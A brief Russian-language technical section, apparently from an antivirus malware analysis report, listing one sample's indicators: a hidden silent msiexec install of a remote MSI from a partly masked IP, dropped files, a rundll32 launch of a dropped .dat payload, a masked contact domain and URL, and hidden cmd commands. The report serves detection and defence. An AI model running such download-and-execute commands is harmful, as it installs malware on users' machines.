Техническая информация
- '<SYSTEM32>\msiexec.exe' back=13 error=continue /i http://18#.#7.122.220/555.msi /q OnLoad="%WINDIR%\notepad.exe"
- %APPDATA%\microsoft\forms\winword.box
- %TEMP%\rjmrssmzdd872hrjmrssmzdd.dat
- 'no###tored.com':80
- http://18#.#7.122.220/555.msi
- http://no###tored.com/docs/saz.php
- DNS ASK no###tored.com
- '%WINDIR%\installer\msi4.tmp'
- '<SYSTEM32>\msiexec.exe' back=13 error=continue /i http://18#.#7.122.220/555.msi /q OnLoad="%WINDIR%\notepad.exe"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C echo %logonserver%' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %TEMP%\RJMRSSMZDD872hRJMRSSMZDD.dat, JHOQMXPL
- '<SYSTEM32>\cmd.exe' /C echo %logonserver%